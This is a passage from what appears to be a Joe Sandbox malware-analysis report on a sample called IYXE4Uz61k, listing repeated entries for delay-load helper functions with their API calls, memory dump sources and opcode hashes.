                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 3ca64b25fcddfda90f4a19402b7b0a016af743dd37929007f3cf7ca35509ba4e
                                                                                                                                                                                                    • Instruction ID: 3d202ab7336f0cbe787597bff946090cd1ac6131e3a86a8785147641366768d5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ca64b25fcddfda90f4a19402b7b0a016af743dd37929007f3cf7ca35509ba4e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79B012D9398005AC310472591C07C3B124CF0C3B11330813FFD15C0681F840AC040A33
                                                                                                                                                                                                    Function 0088E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 24c0fc506574f09e88afcc19bc630a05fa477b90c9ba394cbf3476b3b15148ab
                                                                                                                                                                                                    • Instruction ID: 7eb7f62cc4d3fbdde947b015e86fb3ec51f53eaa5e4c1f45f8320f53452add9f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24c0fc506574f09e88afcc19bc630a05fa477b90c9ba394cbf3476b3b15148ab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69B012D5369046AC310473491C07C3F124DF4C2B11330413FF816C0681E840AC040A33
                                                                                                                                                                                                    Function 0088E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 2bcb63a11adf85494d440a30b0f6487b34f5d0a77865a6305345510cb04efada
                                                                                                                                                                                                    • Instruction ID: 2df7945fa7d4c5903eae2d12de84b9c9a26c0d9ae2591345dacf966c14bca353
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bcb63a11adf85494d440a30b0f6487b34f5d0a77865a6305345510cb04efada
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5B012E12580047D3104B2481D02C3B030CF5C1B10330C13FF614D1780D8450C0D0B33
                                                                                                                                                                                                    Function 0088E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 837ec13d3a7c8bf8bd52aa921e63e72e5be917eb6b80efd7feae9441a67e563b
                                                                                                                                                                                                    • Instruction ID: d5499b195d66eef5d832659b5595253d68febe29e0e68949ba8d3a2ac069bad3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 837ec13d3a7c8bf8bd52aa921e63e72e5be917eb6b80efd7feae9441a67e563b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0B092A1258004BC3204A2481802C3A0208E581B10320812EB814D1680D8484E040A33
                                                                                                                                                                                                    Function 0088E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E3FC
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 8c5a72e3584ae4a087cdd2435c2166601f2533e352aa8d99828d583be25488c9
                                                                                                                                                                                                    • Instruction ID: deba557b9c5065f84276a82ee42ee78c7fac061985c3035abc6d5cf55179beeb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c5a72e3584ae4a087cdd2435c2166601f2533e352aa8d99828d583be25488c9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64B012E1258004BD3204F2481C02C3B030CF5C1B10330C13FF914D1780D8444C080B33
                                                                                                                                                                                                    Function 0088E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E580
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: a3f7a3e1c082e1e3abd41267e1cddc29058bd6d3f77ff557da089d3f7da29260
                                                                                                                                                                                                    • Instruction ID: d847ffb4ac5eae46b7388d94efe14e59890c44570d62e7f982bd1cecc9e5ac45
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3f7a3e1c082e1e3abd41267e1cddc29058bd6d3f77ff557da089d3f7da29260
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AB012C225810A7D3104B3991C02C3B020CF4C1B24330413FF414C1680F8400C040B33
                                                                                                                                                                                                    Function 0088E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E580
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: dfc60447c96de1df77ff8d96371bc3bbbb5a523826340ece79752c23a73d013a
                                                                                                                                                                                                    • Instruction ID: badfc8d1ea67ad4a6e7ff03141f7d7fbd6607cbeecc10ae9d4b9c4e8dcbb2c74
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfc60447c96de1df77ff8d96371bc3bbbb5a523826340ece79752c23a73d013a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8AB012C2258015BC3104B2995D02C3B021CF0C1B14330433FF414C1680FC400D050B33
                                                                                                                                                                                                    Function 0088E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E580
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 88dded6bd90f809e297b71c4fa791d3b892d9b0fe7e5a67985199ffb1c37d152
                                                                                                                                                                                                    • Instruction ID: f1c2cb57f367d1b256b7d2a9a2d90e326761e14ef01a3aadac28266215265f8d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88dded6bd90f809e297b71c4fa791d3b892d9b0fe7e5a67985199ffb1c37d152
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80B012C2258105BC3144B2995C03C3B021CF0C1B15330433FF414C1680F8400C440B33
                                                                                                                                                                                                    Function 0088E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E51F
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 5da3a625e8c57afd503c178e828784d86f0220bd3b71cd9d4451a93ca12a7166
                                                                                                                                                                                                    • Instruction ID: 4c747d1084a4a42ef5624d2fcaa464d259ec173d935aaa27d44493d5efcd9109
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5da3a625e8c57afd503c178e828784d86f0220bd3b71cd9d4451a93ca12a7166
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30B012C52584047C310873681C06C3F020CF0C2F14330813FF821C0981A8400D080933
                                                                                                                                                                                                    Function 0088E528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E51F
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: c185aa6aff6ea3e9302910836cdb1309461be42337afe475834d768c48daff9d
                                                                                                                                                                                                    • Instruction ID: b2bb7146d3791c64bd0d95d66f99929ffab078dfb83a1b39ac78a329a225ee6b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c185aa6aff6ea3e9302910836cdb1309461be42337afe475834d768c48daff9d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CB012C12585447C3108B24C1D02C3F064CF0C6F24330813FF915C0680E8400C050A33
                                                                                                                                                                                                    Function 0088E532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E51F
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: e2b8067441675da1f2cb2c36a79f5923e3f02fcccec972e2ef5e362fefe1912b
                                                                                                                                                                                                    • Instruction ID: 522ea448300ce72b315f0a0e05cecc40b2bfd13448dd09bc3468490436e67f5c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2b8067441675da1f2cb2c36a79f5923e3f02fcccec972e2ef5e362fefe1912b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1B012C12585047D3108B34C1C02D3F024CF4C2F24330813FF815C0680E8400C040A33
                                                                                                                                                                                                    Function 0088E546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E51F
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: c8bdc6f75f9f48a601791f850e3a1ea97d91d0483a6b5180c90f5b4cd9fc40ce
                                                                                                                                                                                                    • Instruction ID: fc437287cc2c72dce71fb86dcde51269cec96b7898e71598a8c25b962bedba64
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8bdc6f75f9f48a601791f850e3a1ea97d91d0483a6b5180c90f5b4cd9fc40ce
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AB012C12585047C3208B24C5C03C3F020CF0D2F15330433FF815C0680E8400C480A33
                                                                                                                                                                                                    Function 0088E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
